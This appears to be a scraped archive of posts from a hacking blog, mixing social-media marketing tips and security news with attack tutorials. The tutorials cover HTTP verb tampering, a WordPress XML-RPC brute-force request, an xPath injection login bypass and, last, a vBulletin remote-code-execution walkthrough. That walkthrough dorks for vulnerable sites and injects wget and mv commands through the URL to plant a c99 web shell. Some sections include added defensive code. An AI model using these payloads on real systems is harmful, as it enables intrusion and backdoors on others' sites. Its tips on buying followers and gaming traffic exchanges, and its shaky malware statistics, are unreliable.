
How to use Twitter to promote your business online

Twitter can be a very powerful tool for marketing any business or website online, and by using Twitter, a person can easily reach thousands, hundreds of thousands or even millions of potential customers consistently.

Tweeting Consistently
Once a person creates a profile for their business or for their website on Twitter, they should tweet consistently and update their profile consistently. Tweeting consistently will ensure that their Twitter followers are engaged in the information that they're posting, and usually, tweeting consistently can help a person to obtain new followers for their Twitter account.

Respond To Tweets
When a person has a Twitter account, people can send them tweets, or Twitter users can direct tweets to their Twitter profile. This is an excellent way for a business to connect with its customers and with its potential customers.

If a person has any questions for a business owner, they can easily ask the business owner those questions on Twitter. In addition, a question that is asked by one customer or one potential customer on Twitter is likely a question that many other people have, so when a business owner answers a question from one person, they are likely answering a question that many other people have as well.

Gaining More Followers

In order to reach a large number of people on Twitter, it's vital to gain a large number of followers. There are many ways to gain followers on Twitter, and one of the ways is to buy Twitter followers.

When a business owner buys Twitter followers, they should make sure that the Twitter followers that they bought are real and active. The more active that Twitter followers are, the more successful that the marketing strategy of a business on Twitter will be.

Following Other Twitter Users

In addition to gaining followers on Twitter, a business should follow other Twitter users. Following other Twitter users helps to promote interactivity among users on Twitter, and in addition, a business that follows many other people and many other profiles is likely to gain more followers much more quickly for its Twitter profile.

Posting Funny And Interesting Information

A business owner should frequently post funny and interesting information and content on Twitter. Posting funny, interesting and informative content will help to ensure that a person's Twitter followers stay interested and engaged, and in addition, posting funny and interesting content can increase the likelihood that the Twitter followers of a business profile will retweet the tweets of the business owner.

When Twitter users retweet content that a business has posted, that content can easily reach hundreds of thousands or even millions of other Twitter followers very quickly, and as a result, a business can very easily reach many more potential customers by having its followers retweet content that it has tweeted.

In addition, a business owner should also post deals and discounts for certain products and services sporadically by using their Twitter account. Posting deals and discounts will attract new customers to the business, and these deals and discounts make it likely that customers that have already placed orders with a business will place more orders in the near future. 

About Author: This article was written by Andy G, a tech geek and Linux fan from Austria. At the present moment he maintains a firmware and driver download website called


5 Best Joomla Security Extensions For You to Breathe Easy

Apart from the WordPress and Drupal content management systems, Joomla is the most popular CMS used all over the world to power websites of all sorts and sizes. Just like any other open-source CMS, Joomla-powered sites also have to deal with hacking attacks. In fact, almost every day Joomla-powered sites encounter callous hackers who mutilate website pages, upload backdoors and steal or delete sensitive information. Sadly, most of these attacks cost website owners a substantial amount of time and money to get the damage fixed. It is therefore necessary for website owners to take every possible measure that helps to strengthen the security of their Joomla site.

In this post we have come up with a list of remarkably useful Joomla extensions that help to secure your Joomla website.



jHackGuard is an extension designed by Siteground that helps to protect the websites of Joomla users from being hacked. The extension is made publicly available to Joomla site owners, irrespective of whether they're using Siteground hosting services or not. This extension is a blend of a security plugin (that does the system work) and a component (that helps to handle configurations). It helps to protect a Joomla site by filtering the user's input data and integrating more PHP security settings. However, the plugin is disabled for authenticated administrators so that its filters don't prevent them from performing their administrative tasks.

jHackGuard is compatible with Joomla version 3 and higher. If your site runs an older Joomla version, you can download the appropriate version of jHackGuard for it, such as jHackGuard for Joomla 1.5.

Akeeba Backup

Akeeba Backup, formerly known as JoomlaPack, is an open-source and free backup component that creates a full website backup which can be used to restore your site on any server running Joomla-powered sites. It lets you create a backup of your website in a single archive, including all the files, a “database snapshot” and an “installer”.
The best aspect of this extension is that it runs an AJAX-powered backup and restore process that helps to prevent server timeouts, even when you're running a large website. Besides, you can choose to create a backup of only your website files or only your database. It is compatible with Joomla version 2.5 or 3.x only.


HTTP Verb Tampering Demo/Example/Tutorial

What is HTTP Verb?

  • According to Wiki, "The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide Web."

  • A verb is nothing but an HTTP method, used to indicate the desired action to be performed on the identified resource.

List of some basic HTTP verbs (methods):
  • GET
  • HEAD
  • POST 
  • PUT

What is HTTP Verb Tampering? 

It's a method of bypassing a defense technique by tampering with the verb. Some secret directories have access restricted by basic authentication. These directories are protected by the .htaccess file, which can be easily exploited. This attack is the result of an Apache .htaccess file misconfiguration.

An administrator limits access to the private resource or directory only for the POST request method. See the vulnerable code below.

Here AuthUserFile is the path to the .htpasswd file, which contains the username and password in encrypted format.

require valid-user

It limits only the POST method and matches the credentials against those saved in the .htpasswd file; if they are wrong, an error page shows up.

Here the administrator has limited the POST method but has not blocked the other methods. This means any request made with another method would give the attacker access to the protected private resources or directory. Below I have provided a video demo of successful exploitation of an HTTP verb tampering vulnerability via Live HTTP Headers (a Firefox add-on) on an AT&T subdomain (reported and fixed). In the next post I will be showing you various ways to fix or apply a patch to this vulnerability.
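The weak rule described above next to a corrected one, as an added example that is not code from the original post: a small Python check that flags <Limit> blocks which apply "require" to only some methods. Both .htaccess samples are constructed here, the AuthUserFile path is a placeholder, and the function names are hypothetical.

```python
import re

# Methods considered by this check (the post lists GET, HEAD, POST and PUT).
KNOWN_METHODS = ("GET", "HEAD", "POST", "PUT", "DELETE",
                 "OPTIONS", "PATCH", "TRACE", "CONNECT")

# <Limit M1 M2> ... </Limit>; "\s+" keeps this from matching <LimitExcept>.
LIMIT_RE = re.compile(r"<Limit\s+([^>]+)>(.*?)</Limit>",
                      re.IGNORECASE | re.DOTALL)
REQUIRE_RE = re.compile(r"^\s*require\s+\S+", re.IGNORECASE | re.MULTILINE)

# Constructed sample: authentication is enforced for POST only.
WEAK = """\
AuthType Basic
AuthName "Private"
AuthUserFile /path/to/.htpasswd
<Limit POST>
    require valid-user
</Limit>
"""

# Constructed sample: no <Limit> wrapper, so "require" applies to every method.
FIXED = """\
AuthType Basic
AuthName "Private"
AuthUserFile /path/to/.htpasswd
require valid-user
"""


def audit_htaccess(text):
    """Return one finding per <Limit> block that scopes 'require' to some methods."""
    findings = []
    for block in LIMIT_RE.finditer(text):
        if not REQUIRE_RE.search(block.group(2)):
            continue  # block does not carry an auth requirement
        limited = set(block.group(1).upper().split())
        if "GET" in limited:
            limited.add("HEAD")  # Apache treats HEAD as covered by GET in <Limit>
        unprotected = sorted(set(KNOWN_METHODS) - limited)
        if unprotected:
            findings.append({"limited": sorted(limited),
                             "unprotected": unprotected})
    return findings


def protects_all_methods(text):
    """True when a 'require' line exists outside every <Limit> block."""
    return bool(REQUIRE_RE.search(LIMIT_RE.sub("", text)))


if __name__ == "__main__":
    for name, sample in (("WEAK", WEAK), ("FIXED", FIXED)):
        print(name, audit_htaccess(sample), protects_all_methods(sample))
```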


Reviewed by Rishal Dwivedi on Sep 21 2014. Rating: 5

Best Traffic Exchange service website | Hitleap

There's a huge demand for traffic exchange websites. You can find any number of websites on the internet providing traffic exchange services. After having an experience with all of them, I came to the conclusion that Hitleap is one of the best and top websites in terms of its services, monetary profit and website performance. The website works by earning minutes by surfing other websites via the Hitleap viewer software and then spending them on getting traffic to your website. You can earn minutes easily just by surfing other websites via the Hitleap viewer software; just open it and let it earn minutes for you. You use the minutes later to get traffic to your submitted website, and the traffic your URL gets depends on the minutes. The submitted website needs to be approved by their moderator, which is done within a fraction of a second. It also provides a feature for setting how many seconds or minutes a visitor should stay on your website.

Earning via HitLeap?

- Some websites provide credits just for visiting a URL; you can mask them and submit them to Hitleap in order to sit back and earn. (Will be covering this briefly in later tutorials.)

- Referrals (10% of the minutes your referrals earn; 20% of the cash value of any purchase)


Mobile security infestation [Infographics]

The explosion in popularity of mobile devices has changed the way that people go about their daily lives. Their reliance on the efficiency and speed of these gadgets has made location--often--irrelevant. However, with the reliance comes risk; the number of viruses and hackers lurking for unencrypted data has risen dramatically over the past few years, a number closely related to the rise in smartphone and tablet usage over that same period of time.

This infographic, provided by, is an interesting look at mobile security, how it is being exploited, and the future of safe usage on mobile devices.

 Russel Cooke is a journalist based in Louisville, KY. His love of technology often drives his stories, which also center around social media, content creation, and marketing. You can follow him on Twitter @RusselCooke2.


Wordpress XML-RPC Brute Force Attack Vulnerability

Today I'll be sharing an easy and quite interesting tutorial on the WordPress XML-RPC brute force attack.
As we all know, nowadays whenever an attacker gets his hands on a WordPress website, the first thing he tries in order to compromise the website is a brute force attack. The attacker loads a list of user and password combinations in order to guess the correct one. It's always the first and mandatory option to try from the point of view of a newbie attacker. As a result of the day-by-day increase in brute force attacks, developers have started using login CAPTCHA plugins to protect themselves from such attacks.

XML-RPC is a WordPress interface, and this functionality has been turned on by default since WordPress 3.5. Recently we have seen very critical vulnerabilities found in it which affected a quarter of the internet: the pingback DDoS vulnerability, arbitrary code execution, etc. Recently it has become known that attackers are taking advantage of the XML-RPC wp.getUsersBlogs method in order to launch brute force attacks against websites. In XML-RPC, many of the calls need credentials in order to execute, so an attacker can try different combinations of users and passwords. The output returned shows whether the combination is valid or invalid.

Step by step guide -

 - Locate the XMLRPC on the target website - localhost/xmlrpc.php

- Send a POST request with the following code given below.

<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value> <string>user</string></value></param>  <param><value><string>password</string></value></param></params></methodCall>

- Check the response

If wrong combination - faultCode


If right - isAdmin

Hope you all liked this tutorial.  Any queries? Drop it down in comments!.
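A detection check for the pattern described in this post, as an added example that is not part of the original tutorial: it counts POST requests to xmlrpc.php per client address inside a sliding time window in web server access logs. The log lines, addresses, threshold and window are constructed assumptions, and the function names are hypothetical.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined/common log format: ip ident user [time] "METHOD path proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse(line):
    """Return (ip, timestamp, method, path without query) or None if unparsable."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0]


def xmlrpc_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Map each client IP to its peak number of xmlrpc.php POSTs within `window`.

    Only IPs that reach `threshold` are returned. XML-RPC faults travel in the
    response body, so the HTTP status is not used to tell failures apart here.
    """
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    flagged = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path = rec
        if method != "POST" or not path.endswith("/xmlrpc.php"):
            continue
        seen = recent[ip]
        seen.append(ts)
        while ts - seen[0] > window:
            seen.popleft()
        if len(seen) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(seen))
    return flagged


def _line(ip, sec, method="POST", path="/xmlrpc.php", status=200):
    # Helper that builds one constructed log line for the sample below.
    return (f'{ip} - - [21/Sep/2014:10:00:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "-"')


# Constructed sample: one noisy client, one occasional client, normal browsing.
SAMPLE_LOG = (
    [_line("203.0.113.7", s) for s in range(0, 40, 5)]
    + [_line("198.51.100.20", 3), _line("198.51.100.20", 50)]
    + [_line("198.51.100.21", s, method="GET", path="/index.php")
       for s in range(10)]
)

if __name__ == "__main__":
    print(xmlrpc_bursts(SAMPLE_LOG))
```

Addresses returned by xmlrpc_bursts are candidates for rate limiting or blocking at the web server, and the threshold should be tuned against legitimate XML-RPC clients of the site.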


Malware: How we are Infected [InfoGraphic]

So you have a computer, but if it was infected with a virus, what would you do? Would you even know it was there? It is a well-known fact that over 32% of all computers in the world have malware of some sort. Today we will be talking about the infamous computer virus and what it is.

So let's start with something you all have probably heard of, Malware. Malware is a program made to infiltrate your computer, disable parts of it, and thus gain access to your hard drive, search history and such to aid with stealing information. However, there are other types of malware out there. Let's get to know them and how much of the 32% they infect.

At 57%, first we have the virus. This is software that has the capability to copy itself and send itself into other folders. Then there is the "Trojan" at 21%. The Trojan is malicious software that hides on the internet disguised as some sort of program or free item, and once you download it, you will soon discover it is malicious. But the Trojan has a brother at 7%, called the "Trojan Downloader". This type of virus does the same thing as the simple Trojan, but once on your computer it downloads more viruses and software, then begins to use those programs.

Then at 3% there is the "Exploit", which finds a glitch, bug or system error and uses that to hack into your computer. Next we have the "Worm" at 2%, this malicious bug works the same as a Trojan, but then copies and pastes itself across your computer network.

But not all viruses seem so bad when you get them, for instance the "Adware" at 3%. This type of virus infects your computer so nothing happens at first, but once you log into your web browser, then immediately your screen will be flooded with ads. There is also the "Monitoring Tool" with 2% of the 32% infected. This malware infects your computer and hides, not doing anything but monitoring your activity, (Search history, keyboard history etc.) and then sends those back to a remote server.

There is also one of the worst at 1%, the "Back Door". This virus infects your computer remotely, not allowing your anti-virus security to even detect it, but sure enough it does. And lastly we have one of the worst but luckily at a low percentage of 0.01%, "Spyware". This diabolically designed software infects your computer and takes the most important pieces of information it can find and sends it back to wherever it came from. This information is generally passwords, credit card numbers and other sensitive information.
All of these viruses have devastating effects. Last year there were 27 million strains of malware made, which means 74,000 new viruses are created every day. The number of homes in the United States that experience spam is 24 million. The number of homes with serious viruses in the last 2 years is 16 million, and the number of houses that had spyware in the last 6 months is 6 million. But most devastating of all, over 1 million of all homes have lost money to spyware in the last year. Another devastating fact is that Viruses cost the world 4.55 billion USD every year.

So be safe, don't download anything you are unsure of, and be sure to have an anti-virus software. But most importantly learn how to detect these programs when you get them.


Follow The Following Steps To Make Facebook Page With No Name:

    1) First of all, click here to create your new Facebook page.

    2) Select a Category. Example- Entertainment and after that choose a category.

       3) Copy the code inside the brackets [ ᠌᠌᠌᠌᠌] and paste in the name field.
    4) Click on "I agree to Facebook Pages Terms" and then "Get Started". All done: you can see that a page with no name is created.


iOS Update Quashes Dangerous SSL Bug


Photo by: Duncan Hull

If you haven't gotten the iOS 7.0.6 update, you need to stop what you're doing and get it now. There's a dangerous SSL bug that can hurt you in numerous ways if you don't take care of it right away by updating your Apple operating system. Even if you have an older version, you're going to want to make sure you're protected and have the latest OS available for your particular mobile device.

Back in February of this year, it came out that not updating could lead to bad people being able to read and modify encrypted communications whether people were using iPhones, iPads or other iOS devices. As you might imagine, this upset a lot of people. The good news is that Apple was pretty quick at making sure an update was available for people who downloaded it.

And yet that's part of the problem - not everyone updates their operating system on their own, especially on their phone or mobile device. Some people have claimed that it wasn't a flaw and was built into iOS as a means for people - like the NSA perhaps - to be able to spy on people more easily. Apple denied the claims, of course, but if you Google around, you're going to find some interesting speculation about the "flaw" found in iOS.

According to Ars Technica, the problem may have gone beyond iOS mobile devices and actually affected Mac OS X users - even if they had all the current patches and updates installed! According to them, "[The] vulnerability has been confirmed in iOS versions 6.1.5, 7.0.4, and 7.0.5, and OS X 10.9.0 and 10.9.1." That's quite a wide vulnerability. And while Apple seemed to be working fast to squash the bug last month, there's a good chance that a lot of people still don't have it patched.

In order to make sure you stay safe, here are some specific tips you should follow.

  • Always Update - The first thing you want to do is make sure you ALWAYS update your OS when you find out there's a new version available.
  • Be Aware - In order to know when you should update your OS, you're going to make sure you're aware of major problems that have been found.
  • Act Quickly - The sooner you patch the vulnerable code, the sooner you're going to be safe from attacks.

While there's no guarantee your mobile devices are going to be safe and secure, you want to make sure you take whatever steps you can to guarantee that you're as safe as possible. If you have any thoughts or opinions about the latest iOS update that killed some major security flaws, feel free to leave a comment below and let us know what you're thinking.

Guest Post:

Written by: Jenny Corteza has used a City Directory Theme because it made her life as a writer a whole lot easier. She's been writing technology articles for many years now.

WhatsApp spam used by ASProx Botnet to Deliver Kuluoz Malware


Photo by: Sean MacEntee

As you probably know, Facebook bought WhatsApp for an obscene amount of money in stock earlier this year. What you might not know is that there's a lot of WhatsApp spam that is being used by ASProx Botnet to deliver nasty Kuluoz malware to unsuspecting  users. This is not good news any way you look at the situation. Keep reading if you want to know more about this as well as what you should do to stay safe.

Here's a look at some of the dates when the WhatsApp problem has made Malcovery's "Today's Top Threats" list.

  1. SEPTEMBER 19, 23, 24, 25, 26
  2. OCTOBER 2, 3, 4, 7, 8, 9, 10, 11, 16, 17, 18, 21, 22, 23, 24, 25
  3. NOVEMBER 14
  4. JANUARY 9, 13, 15, 20, 28

Looking at that list, it's easy to start wondering why nothing has been done sooner about the problem. Additionally, it really makes you wonder why Facebook paid so much for the company by offering them stock options.

Going back to November of last year, ComputerWorld published an article about how WhatsApp was one of the top five brands imitated to deliver malware with spam. That's quite a bit of recognition - and not in a good way.

Here's a look at some specific ways you can stay safe and avoid Kuluoz and other malware.

  • Use Protection - The very first thing you want to do is make sure you're using some type of protection. The good news is that you don't need to spend a lot of money to get decent anti-virus software these days.
  • Update Protection - Having protection software is nice, but if you never update it at all, you're going to find that there's still a high chance your computer will get infected and quit working correctly.
  • Be Suspicious - If you're not sure of something online, you want to err on the side of caution and not take any unnecessary risks. Even with a brand like WhatsApp - that's connected to Facebook now - you want to be very careful and know what you're doing.
  • Educate Yourself - Last but most certainly not least, you should make an effort to stay informed about how malware works and the steps you can take to protect yourself from it whenever possible. This is really the best way you can make sure your computer stays safe and virus free.

Following the advice above, there's a good chance you'll be able to avoid WhatsApp spam and not get infected with Kuluoz malware. Still, it's a good idea to pay attention and update your anti-virus software all the time. If you have any experience with WhatsApp that's negative, please leave us a comment below. 

Guest Post - 
Written by: Jenny Corteza deals with staff outsourcing all the time. She's a writer and dealing with editors and others can sometimes be a problem. Still, she loves writing articles about technology. Go figure.


What is xPath Injection? How to exploit with xPath? [Part 1]

xPath Injection occurs when inputs supplied by users are not properly sanitized and a malicious attacker is able to construct and send a malformed xPath query for XML data, with the intention of extracting sensitive information to which normal users don't have access. It is similar to SQL Injection, where attackers do the same: in SQL Injection, SQL queries are crafted, and in xPath Injection, xPath queries are crafted for XML data. XML is queried through xPath, a type of simple descriptive statement that allows an XML query to locate certain information.

To understand more clearly what an XML document looks like, have a look below. It is a simple XML document used to authenticate a user based upon the combination of username and password they entered.


When the username 'admin' and password 'reddit12' are entered, the following xPath query is executed:

/*[1]/user[username="admin" and password="reddit12"]

Which would return the following



Exploiting xPath Injection : Authentication Bypass

A malicious user can bypass the authentication by sending a specially crafted input query.

/*[1]/user[username="admin" and password="reddit12"]

If an attacker submits the following malicious input:

username: admin" or "1"="1
password: anything

the XPath query which will be executed will be the following:

/*[1]/user[username="admin" or "1"="1" and password="anything"]

The XPath query will result in authentication bypass and an attacker will be able to log in to the application as user "admin". This is because the OR clause in the XPath query is a condition which is always true. Under XPath (similar to SQL) the AND clause has precedence over the OR clause, so the XPath query will be evaluated as shown by the following pseudo-code:

username="admin" or [TRUE AND FALSE]
which will result in:
username="admin" or FALSE

As the username admin is valid, the attacker will be able to log in as this user.
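The concatenated query from this section beside a hardened lookup, as an added example that is not code from the original post: the hardened version never places user input inside XPath text and compares credentials as data instead. The XML document is a constructed sample (the post's own document is missing), the "guest" user is invented for illustration, and the function names are hypothetical.

```python
import hmac
import re
import xml.etree.ElementTree as ET

# Constructed sample; only admin/reddit12 comes from the post.
USERS_XML = """\
<users>
  <user><username>admin</username><password>reddit12</password></user>
  <user><username>guest</username><password>guest-pass</password></user>
</users>"""

# Allow-list for usernames (an assumption; adjust to the application's rules).
SAFE_USERNAME = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def build_query_unsafe(username, password):
    """Vulnerable pattern from the post: input concatenated into the XPath text."""
    return f'/*[1]/user[username="{username}" and password="{password}"]'


def operators(query):
    """Boolean operators left in a query once quoted string literals are blanked.

    A query built from the fixed template must always yield ['and']; anything
    else means the input changed the structure of the expression.
    """
    return re.findall(r"\b(and|or)\b", re.sub(r'"[^"]*"', '""', query))


def authenticate(root, username, password):
    """Hardened lookup: return the matching username, or None.

    User input is validated, then compared as data with a constant-time
    comparison. It is never parsed as part of an XPath expression.
    """
    if not SAFE_USERNAME.fullmatch(username):
        return None
    matched = None
    for user in root.iter("user"):
        name = user.findtext("username", default="")
        secret = user.findtext("password", default="")
        name_ok = hmac.compare_digest(name.encode(), username.encode())
        pass_ok = hmac.compare_digest(secret.encode(), password.encode())
        if name_ok and pass_ok:
            matched = name
    return matched


# The input quoted in the post.
INJECTED_USERNAME = 'admin" or "1"="1'

if __name__ == "__main__":
    root = ET.fromstring(USERS_XML)
    print(build_query_unsafe("admin", "reddit12"))
    print(build_query_unsafe(INJECTED_USERNAME, "anything"))
    print(operators(build_query_unsafe(INJECTED_USERNAME, "anything")))
    print(authenticate(root, "admin", "reddit12"))
    print(authenticate(root, INJECTED_USERNAME, "anything"))
```

Where the XPath library supports bound variables, passing the username and password as variables achieves the same separation of query and data.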

That was a basic introduction to tell you what xPath actually is and how to exploit it. I will be dividing this post into 3 separate parts. This was the 1st part; in the 2nd part I will be explaining how to extract database information through xPath Injection. In the 3rd part we will be talking about some automated tools for exploiting xPath Injection.

What is Remote Code Execution? How to Hack Websites

According to Wikipedia, Remote Code Execution can be defined as “In computer security, arbitrary code execution or remote code execution is used to describe an attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process. It is commonly used in arbitrary code execution vulnerability to describe a software bug that gives an attacker a way to execute arbitrary code. A program that is designed to exploit such vulnerability is called an arbitrary code execution exploit. Most of these vulnerabilities allow the execution of machine code and most exploits therefore inject and execute shell code to give an attacker an easy way to manually run arbitrary commands. The ability to trigger arbitrary code execution from one machine on another (especially via a wide-area network such as the Internet) is often referred to as remote code execution”

vBulletin RCE Injection

Few websites running vBulletin are vulnerable to Remote Code Execution, by exploiting the vulnerability we can get our PHP backdoor shell uploaded on the website. We’ll use a dork to find the vulnerable website.

Note: Don’t keep yourself restricted when it comes to using dorks, use other search engines too other than Google, like Bing, Yahoo etc. Use of multiple search engines will help you to get more vulnerable websites.

Dork: inurl:faq.php & intext:"Warning: system() [function.system]"

Now, select any website of your choice from the search result, and go to its faq.php page. If the website is vulnerable, you will get the following on the page.

You will get an error similar to Warning: system() [function.system]: Cannot execute a blank command in [path]/faq.php(324) : eval()'d code on line 1

So, firstly upload your PHP shell on any free hosting website or you can use as it has already got an uploaded .txt shell. (We will be first uploading our shell in .txt form, and later will be changing the extension to .php after the upload process is completed.

Suppose the vulnerable website is So in order to upload our shell enter the following in the URL bar: /tmp;wget

To check if we were able to successfully upload our shell, enter the following in the URL bar /tmp;ls -la c99.txt

Where c99.txt is the name of your uploaded shell. If we were successful in uploading our shell, we see the following text on the page. (Might be a little different in some cases)
-rw-r--r-- 1 nobody nobody

We know that our shell is successfully uploaded on the website, now it’s time to change the file format from .txt to .php in order to execute it on the server. /tmp;mv c99.txt check.php
(You can change check.php to any other name of your choice)

Now, the file format is changed. It’s time to execute our shell, so to execute it enter the following in the URL bar /tmp;mv c99.txt check.php

Bingo!! We successfully exploited vBulletin Remote Code Execution Vulnerability.

Copyright © 2014. Hacking-Sec - All Rights Reserved